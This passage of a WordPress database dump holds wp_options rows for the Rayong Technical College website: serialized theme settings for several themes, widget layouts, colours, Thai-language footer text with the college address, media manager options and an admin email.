(851, 'theme_mods_synapse', 'a:19:{i:0;b:0;s:18:\"nav_menu_locations\";a:2:{s:7:\"primary\";i:2;s:3:\"top\";i:0;}s:18:\"custom_css_post_id\";i:-1;s:26:\"synapse_hide_title_tagline\";i:1;s:31:\"synapse_feat_post_slider_enable\";i:1;s:23:\"synapse_disable_sidebar\";i:1;s:19:\"synapse_blog_layout\";s:7:\"synapse\";s:16:\"synapse_social_1\";s:4:\"none\";s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1511364309;s:4:\"data\";a:6:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:8:\"footer-1\";a:0:{}s:8:\"footer-2\";a:0:{}s:8:\"footer-3\";a:0:{}s:8:\"footer-4\";a:0:{}}}s:21:\"rtslider_enable_front\";s:0:\"\";s:15:\"rtslider_enable\";s:0:\"\";s:21:\"rtslider_enable_posts\";s:0:\"\";s:21:\"rtslider_enable_pages\";s:0:\"\";s:14:\"rtslider_count\";s:1:\"2\";s:19:\"rtslider_slide_img1\";s:68:\"http://sim.technicrayong.ac.th/wp-content/uploads/2017/11/Header.png\";s:19:\"rtslider_slide_img2\";s:86:\"http://sim.technicrayong.ac.th/wp-content/uploads/2017/11/cropped-FullSizeRender-1.jpg\";s:28:\"synapse_feat_post_slider_cat\";s:1:\"4\";s:27:\"synapse_feat_post_slider_pc\";s:1:\"0\";s:21:\"synapse_sidebar_width\";s:1:\"4\";}', 'yes'),
(852, 'theme_switched', '', 'yes'),
(853, 'widget_synapse_rp', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(875, 'theme_mods_mh-campusmag', 'a:6:{i:0;b:0;s:18:\"nav_menu_locations\";a:1:{s:8:\"main_nav\";i:2;}s:18:\"custom_css_post_id\";i:-1;s:16:\"header_textcolor\";s:5:\"blank\";s:12:\"header_image\";s:21:\"random-uploaded-image\";s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1511363736;s:4:\"data\";a:14:{s:19:\"wp_inactive_widgets\";a:0:{}s:7:\"sidebar\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:6:\"home-1\";a:0:{}s:6:\"home-2\";a:0:{}s:6:\"home-3\";a:0:{}s:6:\"home-4\";a:0:{}s:6:\"home-5\";a:0:{}s:6:\"home-6\";a:0:{}s:7:\"posts-1\";a:0:{}s:7:\"posts-2\";a:0:{}s:8:\"footer-1\";a:0:{}s:8:\"footer-2\";a:0:{}s:8:\"footer-3\";a:0:{}s:8:\"footer-4\";a:0:{}}}}', 'yes'),
(876, 'widget_mh_custom_posts', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(877, 'widget_mh_slider_hp', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(878, 'widget_mh_magazine_lite_tabbed', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(879, 'widget_mh_magazine_lite_posts_large', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(880, 'widget_mh_magazine_lite_posts_focus', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(881, 'widget_mh_magazine_lite_posts_stacked', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(884, 'theme_mods_mh-magazine-lite', 'a:6:{i:0;b:0;s:18:\"nav_menu_locations\";a:1:{s:8:\"main_nav\";i:2;}s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1511368935;s:4:\"data\";a:14:{s:19:\"wp_inactive_widgets\";a:0:{}s:7:\"sidebar\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:6:\"home-1\";a:0:{}s:6:\"home-2\";a:0:{}s:6:\"home-3\";a:0:{}s:6:\"home-4\";a:0:{}s:6:\"home-5\";a:0:{}s:6:\"home-6\";a:0:{}s:7:\"posts-1\";a:0:{}s:7:\"posts-2\";a:0:{}s:8:\"footer-1\";a:0:{}s:8:\"footer-2\";a:0:{}s:8:\"footer-3\";a:0:{}s:8:\"footer-4\";a:0:{}}}s:16:\"header_textcolor\";s:5:\"blank\";s:12:\"header_image\";s:13:\"remove-header\";}', 'yes'),
(924, 'theme_mods_education-base', 'a:5:{i:0;b:0;s:18:\"nav_menu_locations\";a:2:{s:7:\"primary\";i:2;s:8:\"one-page\";i:0;}s:18:\"custom_css_post_id\";i:-1;s:28:\"education_base_theme_options\";a:16:{s:36:\"education-base-header-id-display-opt\";s:7:\"disable\";s:32:\"education-base-enable-header-top\";b:1;s:40:\"education-base-top-header-design-options\";s:10:\"left-curve\";s:32:\"education-base-enable-top-social\";b:0;s:28:\"education-base-enable-sticky\";b:1;s:28:\"education-base-header-height\";s:3:\"200\";s:29:\"education-base-newsnotice-cat\";s:1:\"0\";s:29:\"education-base-enable-feature\";b:1;s:31:\"education-base-enable-animation\";b:1;s:29:\"education-base-sidebar-layout\";s:10:\"no-sidebar\";s:40:\"education-base-disable-widget-title-icon\";b:0;s:40:\"education-base-front-page-sidebar-layout\";s:10:\"no-sidebar\";s:37:\"education-base-archive-sidebar-layout\";s:10:\"no-sidebar\";s:25:\"education-base-all-slides\";s:37:\"[{\"selectpage\":\"\"},{\"selectpage\":\"\"}]\";s:40:\"education-base-feature-slider-image-only\";b:1;s:39:\"education-base-fs-image-display-options\";s:14:\"responsive-img\";}s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1511417898;s:4:\"data\";a:7:{s:19:\"wp_inactive_widgets\";a:0:{}s:22:\"education-base-sidebar\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:19:\"education-base-home\";a:0:{}s:14:\"footer-col-one\";a:0:{}s:14:\"footer-col-two\";a:0:{}s:16:\"footer-col-three\";a:0:{}s:15:\"footer-col-four\";a:0:{}}}}', 'yes'),
(925, 'widget_education_base_course', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(927, 'widget_education_base_gallery', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(929, 'widget_education_base_about', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(930, 'widget_education_base_team', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(932, 'widget_education_base_testimonial', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(934, 'widget_education_base_contact', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(936, 'widget_education_base_fdcolumn', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(937, 'widget_education_base_posts_col', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(982, 'nav_menu_options', 'a:2:{i:0;b:0;s:8:\"auto_add\";a:0:{}}', 'yes'),
(1051, 'new_admin_email', 'prinya.c@technicrayong.ac.th', 'yes'),
(1146, '_transient_synapse_categories', '2', 'yes'),
(1154, 'theme_mods_university-hub', 'a:6:{i:0;b:0;s:18:\"nav_menu_locations\";a:4:{s:7:\"primary\";i:2;s:6:\"social\";i:7;s:3:\"top\";i:0;s:8:\"notfound\";i:0;}s:18:\"custom_css_post_id\";i:-1;s:13:\"theme_options\";a:40:{s:10:\"show_title\";b:0;s:12:\"show_tagline\";b:0;s:11:\"show_ticker\";b:1;s:15:\"ticker_category\";i:4;s:21:\"show_social_in_header\";b:1;s:13:\"global_layout\";s:13:\"three-columns\";s:15:\"breadcrumb_type\";s:6:\"simple\";s:25:\"news_and_events_ncategory\";i:4;s:25:\"news_and_events_ecategory\";i:4;s:20:\"latest_news_category\";i:4;s:18:\"latest_news_layout\";s:1:\"1\";s:22:\"featured_slider_status\";s:9:\"home-page\";s:22:\"featured_slider_page_1\";i:135;s:15:\"pagination_type\";s:7:\"default\";s:17:\"homepage_sections\";a:2:{i:0;s:15:\"news-and-events\";i:1;s:14:\"call-to-action\";}s:22:\"featured_slider_page_2\";i:140;s:22:\"featured_slider_page_3\";i:144;s:33:\"featured_slider_transition_effect\";s:4:\"fade\";s:30:\"featured_slider_enable_caption\";b:0;s:28:\"featured_slider_enable_arrow\";b:0;s:28:\"featured_slider_enable_pager\";b:0;s:22:\"featured_slider_number\";i:4;s:22:\"featured_slider_page_4\";s:0:\"\";s:23:\"news_and_events_nnumber\";i:4;s:26:\"latest_news_featured_image\";s:5:\"large\";s:14:\"archive_layout\";s:7:\"excerpt\";s:14:\"contact_number\";s:0:\"\";s:13:\"contact_email\";s:0:\"\";s:17:\"contact_address_1\";s:0:\"\";s:17:\"contact_address_2\";s:0:\"\";s:13:\"ticker_number\";i:10;s:14:\"copyright_text\";s:82:\"วิทยาลัยเทคนิคระยอง Rayong Technical College\";s:21:\"show_social_in_footer\";b:1;s:18:\"latest_news_column\";s:1:\"3\";s:22:\"news_and_events_ntitle\";s:4:\"News\";s:22:\"news_and_events_etitle\";s:6:\"Events\";s:19:\"home_content_status\";b:1;s:14:\"excerpt_length\";i:40;s:18:\"latest_news_number\";i:3;s:26:\"latest_news_excerpt_length\";i:20;}s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1516271745;s:4:\"data\";a:7:{s:19:\"wp_inactive_widgets\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:6:\"meta-2\";i:5;s:12:\"categories-2\";}s:9:\"sidebar-1\";a:1:{i:0;s:13:\"custom_html-2\";}s:9:\"sidebar-2\";a:0:{}s:8:\"footer-1\";a:0:{}s:8:\"footer-2\";a:0:{}s:8:\"footer-3\";a:0:{}s:8:\"footer-4\";a:1:{i:0;s:6:\"text-5\";}}}s:16:\"background_color\";s:6:\"f7fcfe\";}', 'yes'),
(1155, 'widget_university-hub-social', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(1156, 'widget_university-hub-featured-page', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(1157, 'widget_university-hub-recent-posts', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(1178, 'widget_bcn_widget', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(1438, 'bcn_version', '6.0.3', 'no'),
(2025, 'theme_mods_university-hub-pro', 'a:18:{i:0;b:0;s:18:\"nav_menu_locations\";a:5:{s:7:\"primary\";i:2;s:3:\"top\";i:29;s:6:\"footer\";i:0;s:6:\"social\";i:0;s:8:\"notfound\";i:0;}s:18:\"custom_css_post_id\";i:-1;s:13:\"theme_options\";a:233:{s:10:\"show_title\";b:0;s:12:\"show_tagline\";b:0;s:11:\"show_ticker\";b:1;s:12:\"ticker_title\";s:5:\"News:\";s:15:\"ticker_category\";i:3;s:13:\"ticker_number\";i:10;s:14:\"contact_number\";s:0:\"\";s:13:\"contact_email\";s:0:\"\";s:17:\"contact_address_1\";s:0:\"\";s:17:\"contact_address_2\";s:0:\"\";s:21:\"show_social_in_header\";b:1;s:26:\"enable_sticky_primary_menu\";b:1;s:16:\"search_in_header\";b:0;s:11:\"site_layout\";s:5:\"boxed\";s:13:\"global_layout\";s:10:\"no-sidebar\";s:14:\"archive_layout\";s:7:\"excerpt\";s:13:\"archive_image\";s:5:\"large\";s:23:\"archive_image_alignment\";s:6:\"center\";s:12:\"single_image\";s:5:\"large\";s:22:\"single_image_alignment\";s:6:\"center\";s:19:\"home_content_status\";b:0;s:15:\"pagination_type\";s:7:\"default\";s:16:\"show_meta_author\";b:1;s:20:\"show_meta_categories\";b:1;s:14:\"show_meta_tags\";b:1;s:17:\"show_meta_comment\";b:1;s:14:\"copyright_text\";s:82:\"วิทยาลัยเทคนิคระยอง Rayong Technical College\";s:15:\"powered_by_text\";s:192:\"086/13 ถ. ตากสินมหาราช ต. ท่าประดู่ อ. เมืองระยอง จ. ระยอง 21000 โทร 038-611192 แฟกซ์ 038-870717\";s:20:\"reset_footer_content\";b:0;s:21:\"show_social_in_footer\";b:1;s:9:\"go_to_top\";b:1;s:14:\"excerpt_length\";i:40;s:14:\"read_more_text\";s:9:\"Read more\";s:18:\"exclude_categories\";s:0:\"\";s:20:\"author_bio_in_single\";b:1;s:28:\"author_bio_show_recent_posts\";b:0;s:30:\"author_bio_recent_posts_number\";i:3;s:15:\"breadcrumb_type\";s:8:\"advanced\";s:17:\"homepage_sections\";a:3:{i:0;s:12:\"testimonials\";i:1;s:14:\"call-to-action\";i:2;s:15:\"news-and-events\";}s:9:\"cta_title\";s:57:\"เผยแพร่ผลงานวิชาการ\";s:15:\"cta_description\";s:175:\"เอกสารผลงานวิชาการของบุคลากรทางการศึกษา วิทยาลัยเทคนิคระยอง\";s:23:\"cta_primary_button_text\";s:78:\"-- ผลงานวิชาการของผู้บริหาร --\";s:22:\"cta_primary_button_url\";s:230:\"http://www.technicrayong.ac.th/%E0%B8%9C%E0%B8%A5%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%82%E0%B8%AD%E0%B8%87%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%9A%E0%B8%A3%E0%B8%B4%E0%B8%AB/\";s:25:\"cta_secondary_button_text\";s:78:\"-ผลงานวิชาการของครู-อาจารย์-\";s:24:\"cta_secondary_button_url\";s:231:\"http://www.technicrayong.ac.th/%E0%B8%9C%E0%B8%A5%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%82%E0%B8%AD%E0%B8%87%E0%B8%84%E0%B8%A3%E0%B8%B9-%E0%B8%AD%E0%B8%B2%E0%B8%88%E0%B8%B2/\";s:22:\"news_and_events_ntitle\";s:6:\"Events\";s:23:\"news_and_events_nnumber\";i:6;s:25:\"news_and_events_ncategory\";i:34;s:22:\"news_and_events_etitle\";s:4:\"News\";s:23:\"news_and_events_enumber\";i:12;s:25:\"news_and_events_ecategory\";i:39;s:14:\"services_title\";s:8:\"Services\";s:15:\"services_number\";i:6;s:15:\"services_column\";i:3;s:22:\"featured_blocks_number\";i:3;s:22:\"featured_blocks_column\";i:3;s:17:\"latest_news_title\";s:6:\"Events\";s:18:\"latest_news_layout\";s:1:\"1\";s:20:\"latest_news_category\";i:34;s:18:\"latest_news_number\";i:6;s:18:\"latest_news_column\";s:1:\"3\";s:26:\"latest_news_featured_image\";s:5:\"large\";s:26:\"latest_news_excerpt_length\";i:20;s:18:\"testimonials_title\";s:93:\"คณะผู้บริหารวิทยาลัยเทคนิคระยอง\";s:21:\"testimonials_category\";i:13;s:19:\"testimonials_number\";i:5;s:29:\"testimonials_background_image\";s:0:\"\";s:10:\"team_title\";s:8:\"Our Team\";s:13:\"team_category\";i:34;s:11:\"team_number\";i:6;s:11:\"team_column\";s:1:\"3\";s:15:\"font_site_title\";s:6:\"tahoma\";s:17:\"font_site_tagline\";s:6:\"roboto\";s:17:\"font_site_default\";s:6:\"roboto\";s:18:\"font_content_title\";s:6:\"tahoma\";s:17:\"font_content_body\";s:6:\"roboto\";s:17:\"font_heading_tags\";s:6:\"tahoma\";s:15:\"font_navigation\";s:6:\"roboto\";s:19:\"reset_font_settings\";b:0;s:22:\"featured_slider_status\";s:8:\"disabled\";s:33:\"featured_slider_transition_effect\";s:4:\"none\";s:32:\"featured_slider_transition_delay\";i:3;s:35:\"featured_slider_transition_duration\";i:1;s:30:\"featured_slider_enable_caption\";b:0;s:28:\"featured_slider_enable_arrow\";b:0;s:28:\"featured_slider_enable_pager\";b:0;s:31:\"featured_slider_enable_autoplay\";b:1;s:20:\"featured_slider_type\";s:13:\"featured-page\";s:22:\"featured_slider_number\";i:4;s:24:\"featured_slider_category\";s:0:\"\";s:19:\"featured_slider_tag\";s:0:\"\";s:30:\"featured_slider_read_more_text\";s:9:\"Read More\";s:16:\"color_basic_text\";s:7:\"#727272\";s:16:\"color_basic_link\";s:7:\"#253b80\";s:22:\"color_basic_link_hover\";s:7:\"#179bd7\";s:19:\"color_basic_heading\";s:7:\"#222222\";s:22:\"color_basic_page_title\";s:7:\"#222222\";s:29:\"color_basic_button_background\";s:7:\"#179bd7\";s:23:\"color_basic_button_text\";s:7:\"#ffffff\";s:35:\"color_basic_button_background_hover\";s:7:\"#ff6000\";s:29:\"color_basic_button_text_hover\";s:7:\"#ffffff\";s:27:\"color_top_header_background\";s:7:\"#179bd7\";s:38:\"color_top_header_news_title_background\";s:7:\"#ff6000\";s:27:\"color_top_header_news_title\";s:7:\"#ffffff\";s:21:\"color_top_header_link\";s:7:\"#ffffff\";s:27:\"color_top_header_link_hover\";s:7:\"#ffffff\";s:23:\"color_header_background\";s:7:\"#253b80\";s:18:\"color_header_title\";s:7:\"#ffffff\";s:24:\"color_header_title_hover\";s:7:\"#ffffff\";s:20:\"color_header_tagline\";s:7:\"#ffffff\";s:25:\"color_header_contact_icon\";s:7:\"#ffffff\";s:26:\"color_header_contact-title\";s:7:\"#ffffff\";s:30:\"color_header_contact-sub-title\";s:7:\"#ffffff\";s:29:\"color_primary_menu_backgorund\";s:7:\"#ffffff\";s:23:\"color_primary_menu_link\";s:7:\"#222222\";s:29:\"color_primary_menu_link_hover\";s:7:\"#ffffff\";s:40:\"color_primary_menu_link_background_hover\";s:7:\"#179bd7\";s:26:\"color_primary_submenu_link\";s:7:\"#ffffff\";s:32:\"color_primary_submenu_link_hover\";s:7:\"#ffffff\";s:37:\"color_slider_caption_title_background\";s:7:\"#179bd7\";s:36:\"color_slider_caption_text_background\";s:7:\"#ffffff\";s:25:\"color_slider_caption_text\";s:7:\"#707070\";s:25:\"color_slider_caption_link\";s:7:\"#ffffff\";s:31:\"color_slider_caption_link_hover\";s:7:\"#ffffff\";s:17:\"color_slider_icon\";s:7:\"#ffffff\";s:23:\"color_slider_icon_hover\";s:7:\"#ffffff\";s:28:\"color_slider_icon_background\";s:7:\"#ff6000\";s:34:\"color_slider_icon_background_hover\";s:7:\"#179bd7\";s:18:\"color_slider_pager\";s:7:\"#ffffff\";s:25:\"color_slider_pager_active\";s:7:\"#179bd7\";s:27:\"color_slider_primary_button\";s:7:\"#ffffff\";s:29:\"color_slider_secondary_button\";s:7:\"#ffffff\";s:38:\"color_slider_primary_button_background\";s:7:\"#ff6000\";s:40:\"color_slider_secondary_button_background\";s:7:\"#179bd7\";s:24:\"color_content_background\";s:7:\"#f7fcfe\";s:32:\"color_primary_content_background\";s:7:\"#ffffff\";s:19:\"color_content_title\";s:7:\"#727272\";s:18:\"color_content_text\";s:7:\"#727272\";s:18:\"color_content_link\";s:7:\"#253b80\";s:24:\"color_content_link_hover\";s:7:\"#179bd7\";s:23:\"color_content_meta_link\";s:7:\"#888888\";s:29:\"color_content_meta_link_hover\";s:7:\"#179bd7\";s:23:\"color_content_meta_icon\";s:7:\"#888888\";s:23:\"color_content_meta_date\";s:7:\"#ffffff\";s:40:\"color_content_meta_date_month_background\";s:7:\"#253b80\";s:38:\"color_content_meta_date_day_background\";s:7:\"#179bd7\";s:31:\"color_sidebar_widget_background\";s:7:\"#ffffff\";s:19:\"color_sidebar_title\";s:7:\"#222222\";s:18:\"color_sidebar_text\";s:7:\"#727272\";s:18:\"color_sidebar_link\";s:7:\"#001837\";s:24:\"color_sidebar_link_hover\";s:7:\"#179bd7\";s:23:\"color_sidebar_list_icon\";s:7:\"#001837\";s:29:\"color_home_widgets_background\";s:7:\"#ffffff\";s:24:\"color_home_widgets_title\";s:7:\"#00387d\";s:23:\"color_home_widgets_text\";s:7:\"#727272\";s:23:\"color_home_widgets_link\";s:7:\"#253b80\";s:29:\"color_home_widgets_link_hover\";s:7:\"#179bd7\";s:28:\"color_cta_section_background\";s:7:\"#179bd7\";s:28:\"color_cta_main_section_title\";s:7:\"#ffffff\";s:22:\"color_cta_section_text\";s:7:\"#ffffff\";s:24:\"color_cta_section_button\";s:7:\"#ffffff\";s:30:\"color_cta_section_button_hover\";s:7:\"#253b80\";s:35:\"color_cta_section_button_background\";s:7:\"#ffffff\";s:41:\"color_cta_section_button_background_hover\";s:7:\"#ffffff\";s:36:\"color_testimonial_section_background\";s:7:\"#4a4a4a\";s:36:\"color_testimonial_main_section_title\";s:7:\"#00387d\";s:31:\"color_testimonial_section_title\";s:7:\"#ffffff\";s:33:\"color_testimonial_section_content\";s:7:\"#ffffff\";s:23:\"color_testimonial_pager\";s:7:\"#ffffff\";s:38:\"color_testimonial_section_pager_active\";s:7:\"#179bd7\";s:29:\"color_team_section_background\";s:7:\"#ffffff\";s:29:\"color_team_main_section_title\";s:7:\"#00387d\";s:24:\"color_team_section_title\";s:7:\"#001837\";s:35:\"color_team_section_title_background\";s:7:\"#ffffff\";s:32:\"color_service_section_background\";s:7:\"#ffffff\";s:32:\"color_service_main_section_title\";s:7:\"#00387d\";s:27:\"color_service_section_title\";s:7:\"#00387d\";s:38:\"color_service_section_title_background\";s:7:\"#ddf2ff\";s:36:\"color_news_events_section_background\";s:7:\"#f7fcfe\";s:36:\"color_news_events_main_section_title\";s:7:\"#253b80\";s:31:\"color_news_events_section_title\";s:7:\"#272727\";s:30:\"color_news_events_section_text\";s:7:\"#272727\";s:37:\"color_news_events_section_title_hover\";s:7:\"#272727\";s:44:\"color_news_events_section_content_background\";s:7:\"#ffffff\";s:36:\"color_news_events_section_meta_color\";s:7:\"#272727\";s:41:\"color_news_events_section_meta_date_color\";s:7:\"#ffffff\";s:58:\"color_news_events_section_meta_date_month_background_color\";s:7:\"#253b80\";s:56:\"color_news_events_section_meta_date_day_background_color\";s:7:\"#179bd7\";s:36:\"color_latest_news_section_background\";s:7:\"#ffffff\";s:36:\"color_latest_news_main_section_title\";s:7:\"#253b80\";s:31:\"color_latest_news_section_title\";s:7:\"#272727\";s:30:\"color_latest_news_section_text\";s:7:\"#272727\";s:37:\"color_latest_news_section_title_hover\";s:7:\"#179bd7\";s:44:\"color_latest_news_section_content_background\";s:7:\"#ffffff\";s:36:\"color_latest_news_section_meta_color\";s:7:\"#272727\";s:32:\"color_latest_news_section_button\";s:7:\"#ffffff\";s:38:\"color_latest_news_section_button_hover\";s:7:\"#179bd7\";s:43:\"color_latest_news_section_button_background\";s:7:\"#ffffff\";s:49:\"color_latest_news_section_button_background_hover\";s:7:\"#ffffff\";s:33:\"color_latest_news_section_overlay\";s:7:\"#179bd7\";s:40:\"color_featured_blocks_section_background\";s:7:\"#179bd7\";s:35:\"color_featured_blocks_section_title\";s:7:\"#ffffff\";s:34:\"color_featured_blocks_section_text\";s:7:\"#ffffff\";s:41:\"color_featured_blocks_section_title_hover\";s:7:\"#ffffff\";s:36:\"color_featured_blocks_section_button\";s:7:\"#272727\";s:42:\"color_featured_blocks_section_button_hover\";s:7:\"#ffffff\";s:47:\"color_featured_blocks_section_button_background\";s:7:\"#ffffff\";s:53:\"color_featured_blocks_section_button_background_hover\";s:7:\"#ffffff\";s:31:\"color_footer_widgets_background\";s:7:\"#253b80\";s:26:\"color_footer_widgets_title\";s:7:\"#ffffff\";s:25:\"color_footer_widgets_text\";s:7:\"#ffffff\";s:25:\"color_footer_widgets_link\";s:7:\"#ffffff\";s:31:\"color_footer_widgets_link_hover\";s:7:\"#e9c01e\";s:28:\"color_footer_area_background\";s:7:\"#031358\";s:22:\"color_footer_area_text\";s:7:\"#ffffff\";s:22:\"color_footer_area_link\";s:7:\"#ffffff\";s:28:\"color_footer_area_link_hover\";s:7:\"#ffffff\";s:19:\"color_goto_top_icon\";s:7:\"#ffffff\";s:25:\"color_goto_top_icon_hover\";s:7:\"#ffffff\";s:25:\"color_goto_top_background\";s:7:\"#179bd7\";s:31:\"color_goto_top_background_hover\";s:7:\"#179bd7\";s:21:\"color_pagination_link\";s:4:\"#fff\";s:27:\"color_pagination_link_hover\";s:4:\"#fff\";s:32:\"color_pagination_link_background\";s:7:\"#179bd7\";s:38:\"color_pagination_link_background_hover\";s:7:\"#e9c01e\";s:27:\"color_breadcrumb_background\";s:7:\"#253b80\";s:21:\"color_breadcrumb_link\";s:7:\"#a0c5e8\";s:27:\"color_breadcrumb_link_hover\";s:7:\"#a0c5e8\";s:21:\"color_breadcrumb_text\";s:7:\"#a0c5e8\";s:22:\"featured_slider_page_1\";i:135;s:22:\"featured_slider_page_2\";i:140;s:22:\"featured_slider_page_3\";i:144;s:22:\"featured_slider_page_4\";i:146;}s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1516271693;s:4:\"data\";a:12:{s:19:\"wp_inactive_widgets\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:6:\"meta-2\";i:5;s:12:\"categories-2\";}s:9:\"sidebar-1\";a:0:{}s:9:\"sidebar-2\";a:0:{}s:30:\"sidebar-front-page-widget-area\";a:1:{i:0;s:13:\"custom_html-2\";}s:15:\"extra-sidebar-1\";a:0:{}s:15:\"extra-sidebar-2\";a:0:{}s:15:\"extra-sidebar-3\";a:0:{}s:15:\"extra-sidebar-4\";a:0:{}s:8:\"footer-1\";a:0:{}s:8:\"footer-2\";a:0:{}s:8:\"footer-3\";a:0:{}s:8:\"footer-4\";a:1:{i:0;s:6:\"text-5\";}}}s:16:\"background_color\";s:6:\"f7fcfe\";s:16:\"awesplash_enable\";i:0;s:20:\"awesplash_opt_enable\";i:0;s:22:\"awesplash_heading_text\";s:0:\"\";s:23:\"awesplash_heading_style\";s:4:\"clip\";s:17:\"awesplash_content\";s:0:\"\";s:21:\"awesplash_button_text\";s:45:\"เข้าสู่เว็บไซต์\";s:26:\"awesplash_background_color\";s:7:\"#1e73be\";s:27:\"awesplash_heading_text_list\";s:0:\"\";s:29:\"awesplash_heading_typo_enable\";i:0;s:29:\"awesplash_content_typo_enable\";i:0;s:25:\"awesplash_background_type\";s:5:\"color\";s:27:\"awesplash_background_slider\";s:100:\"807|%2Fwp-content%2Fuploads%2F2018%2F01%2F27024291_535295693513290_2564198707510501767_o-150x150.jpg\";}', 'yes'),
(2114, 'wpmediamanager_settings', 'a:36:{s:17:\"enable_wpmmanager\";s:1:\"1\";s:16:\"enable_removeall\";s:1:\"0\";s:16:\"display_medianum\";s:1:\"0\";s:20:\"enable_customfilters\";s:1:\"1\";s:19:\"show_duplicatefiles\";s:1:\"1\";s:23:\"enable_gallery_features\";s:1:\"1\";s:17:\"enable_gallery_sc\";s:1:\"1\";s:12:\"border_color\";s:0:\"\";s:19:\"grid_column_desktop\";s:1:\"6\";s:18:\"grid_column_tablet\";s:1:\"3\";s:18:\"grid_column_mobile\";s:1:\"1\";s:12:\"slider_speed\";s:3:\"600\";s:12:\"slider_pause\";s:4:\"4000\";s:18:\"gallery_image_size\";s:85:\"a:4:{i:0;s:9:\"thumbnail\";i:1;s:5:\"large\";i:2;s:6:\"medium\";i:3;s:14:\"post-thumbnail\";}\";s:15:\"enable_lightbox\";s:1:\"1\";s:15:\"choose_pp_theme\";s:10:\"pp_default\";s:15:\"animation_speed\";s:6:\"normal\";s:15:\"slideshow_speed\";s:4:\"5000\";s:9:\"dot_color\";s:0:\"\";s:16:\"dot_active_color\";s:0:\"\";s:11:\"pager_color\";s:0:\"\";s:18:\"pager_active_color\";s:0:\"\";s:14:\"arrow_bg_color\";s:0:\"\";s:11:\"arrow_color\";s:0:\"\";s:19:\"arrow_hover_bgcolor\";s:0:\"\";s:21:\"arrow_hover_fontcolor\";s:0:\"\";s:22:\"enable_pdf_file_design\";s:1:\"1\";s:16:\"show_size_amount\";s:1:\"1\";s:16:\"show_format_type\";s:1:\"1\";s:16:\"pdffile_bg_color\";s:0:\"\";s:17:\"pdffile_bg_hcolor\";s:0:\"\";s:18:\"pdffile_font_color\";s:0:\"\";s:19:\"pdffile_font_hcolor\";s:0:\"\";s:17:\"pdffile_font_size\";s:2:\"12\";s:15:\"file_icon_color\";s:0:\"\";s:14:\"file_icon_size\";s:2:\"15\";}', 'yes'),
(2115, 'wpmediamanager_s_filtersize', '[\"400x300\",\"640x480\",\"800x600\",\"1024x768\",\"1600x1200\"]', 'yes'),
(2116, 'wpmediamanager_custom_dimension', '[\"400x300\",\"640x480\",\"800x600\",\"1024x768\",\"1600x1200\"]', 'yes'),
(2117, 'wpmedia_selected_wt_default', '[[\"0-61440\",\"kB\"],[\"61440-122880\",\"kB\"],[\"122880-184320\",\"kB\"],[\"184320-245760\",\"kB\"],[\"245760-307200\",\"kB\"]]', 'yes'),
(2118, 'wpmedia_weight_default', '[[\"0-61440\",\"kB\"],[\"61440-122880\",\"kB\"],[\"122880-184320\",\"kB\"],[\"184320-245760\",\"kB\"],[\"245760-307200\",\"kB\"]]', 'yes');
INSERT INTO `wp_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
